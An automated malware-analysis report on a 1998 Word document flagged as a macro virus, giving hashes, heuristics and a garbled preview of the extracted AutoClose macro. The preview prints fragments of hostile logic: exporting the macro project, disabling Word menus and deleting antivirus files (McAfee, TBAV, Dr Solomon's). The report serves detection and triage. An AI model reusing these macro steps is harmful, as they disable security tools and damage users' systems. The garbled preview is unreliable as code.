Office (OLE) malware analysis — malicious · ea8e70d8f483e64e

MALICIOUS

Office (OLE)

50.5 KB Created: 1998-06-22 22:28:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: ea635257efef815dac9b4410dc5e3022 SHA-1: 591884c794d52661091199f4581ef25c1c549b23 SHA-256: ea8e70d8f483e64e6b41b4ff2fb12c8f0b48ed5bc3db4e609da1c45e06c9aee0

82 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is a legacy Microsoft Word document containing a WordBasic AutoClose macro. This macro is designed to execute automatically when the document is closed, indicating a malicious intent to run arbitrary code. The macro appears to be obfuscated, and further analysis would be required to determine the exact payload.

Heuristics 4

VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	16111 bytes
SHA-256: `c0a12921a00cf390a5654ec6449cf2e6452c959747013a74e41ab89a066479bf`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 3 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Ol354" Rem C293N807B54M314J509Q450H74J572R579O806J796Q692Q192R69F949S219E236U257G713P772R308S718U222I552I204N629D60O837O424E494V768I484M673B647U340D425R357J746 Rem G751U821E108A151I187W871N728D257B827R790H450M802M203F364N343M425N49 Sub AutoClose() ' Word2000 ' ======================================= %W97M. D425R357J746 Rem G751U821E108A151I187W871N728D257B827R790H450M802M203F364N343M425N49 Sub AutoClose()re() ' Word2000 ' ======================================= ´s========= PN728D257B827R790H450M802M203F364N343MiB647U340D425R357J746 Rem G751U821E108KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK======== ´s========= %W97M. D425Ro=================================== PN728D25============== KKKKKKKKKKKKKKKKKKKKKKKKKK. 1KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK======== ´s===4- ´s===4- u===== 3B647U340H74J572R579O806J796Q751U821E108A151I18 R151I187Wuõ Nex cÁ s ========= ==== 9 Sub Autable827Rem G7s 0 ActiveDoc51Int.ReadOnlyRecommended18UFalseW871N7V242V114W632N901N244T74K759F378J526G580F78U111O8951U88T440L S382E325J152O4K7691L182W47 With App======== .En CancelKeyQ75wd==== KKKKKKKd796Q75K356D703U529C756J461L207H95N169U97K2728219G672G89B322R296F479G751B481F863N754U330M80O4094- U619I149LLAt51IN24playAlertsended51IN24NonKKKKK. J616F685N602C44D245J583G8357V2772.ScreenUpd8D2ng2R2===== End 74J5utableO980H240T1297546N693T97 Oprd20s.EnConfirm20sversoClcelKlayAler.KKKusProtectiKKK= ===== End 74J5utApp========.VBE.ActiveVBProject.VBComponKnts(MiB647U).Export "C:\iB647.sysU34App========.CommandBars(MView").20strols(6).En d18UFalseW8App========.CommandBars(MFormat").20strols(12).En d18UFalseW8App========.CommandBars(MTools").20strols(12).En d18UFalseW8App========.20mmandBars(MTools").20strols(13).En d18UFalseW8 'This ce8'heW8a chang7464W632N9 of APMRS \| TUFakI55yro DrHu6063B6End 74J5utabW47 SelEn edVB CancelKe.hAp= uta SF2W8a1 To 2 '7w= CuGo859 Ca"eKy7w==H295S309I400TKKKQ658JU1IO515F5820H5aAe82P88U3467A294W760===5G507R856C541J73K698L406V983rl(tLy781f A.CommandBars(MTo==== .Item(d18UFalJ526deModule.U82cCountLineFal8conMiw)2", vbsMo_pk_== rl(VyRz360 utInt(RKKK* S SelEn) + 1KKKKKKL178027W283O306T318R174H72L452N30H135H450O962S553N190UK* N596R714PO30G5F36564G415I970LEn K32I1G37153E375C614===uTr37===5G507R856C5401IO74J5x5aA=====R564G41tiveVBProjec=.VBE.Ac& Chr(65H5aH295S3022)) & CuGo859 9990UKasMo ag4n d18UFalseW8Ap6063B6Ends(MTo==== .Item(d18UInsO40Modul vbsMo_p, "nce "65H4G41tiv CuG7 S Kill (ct.VPROGRAMME\MCAFEE\VIRUSSCAN\." & Kill (ct.VPROGRAMME\MCAFEE\VIRUSSCAN95\." & Kill (ct.Viw)gras 0\NrojverAn9 irus\V32scan.dll" & nce M908OK75P641U89L155FG58R559F56S324V803P904T416D953S6980F6E1647A25C275O84851Us==72H770F446F877N374Jp= N930L329T258G178I2Q840G702J810Q437C4164709H7 74Jnce V932W838J804W258E EnA338P110450 CaKill (ct.VProgras 0\NrojverAn9 virus\Virscan.deW8A Kill (ct.VPROGRAMME\TBAV\TBAV.DAT" & nce C798G45H381H9474Jnce 01NE 1K 2J547M780B405B311N517N329U769N431Q162B243R950I683= R483F601U944O53N9660=Kill (ct.VTBAV\TBAV.DAT" & Kill (ct.VProgras e\Dr Solomon's\An9 -.EnCo edolkit\." & If Day(Now(r(6= 1 A(VyMonth(Now(r(6= 7heWen464im a As Varian Dim b As Varian 5yro 7 .WholeStory aR855yro 7 utabW4iR856C540Len(a & nce J335P212B885B458QG67S209K867S CuK348F57JM541588Q 274V326O363I32. Jnce L462'7w4G55F978B38 '789D4lEn628M156V653L390C783lse2N831A2104105H128A536O543S8KKKbR85Mid$(a, i, 1 & nce O507E57JE955B61R379K119D1 553M560F467QG61J902Q88O712A430J275W801P417Q276I433V121O347C185C432Ve82L971871N72895138KK* S N289H773A190S708B413T78 '960T5 ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.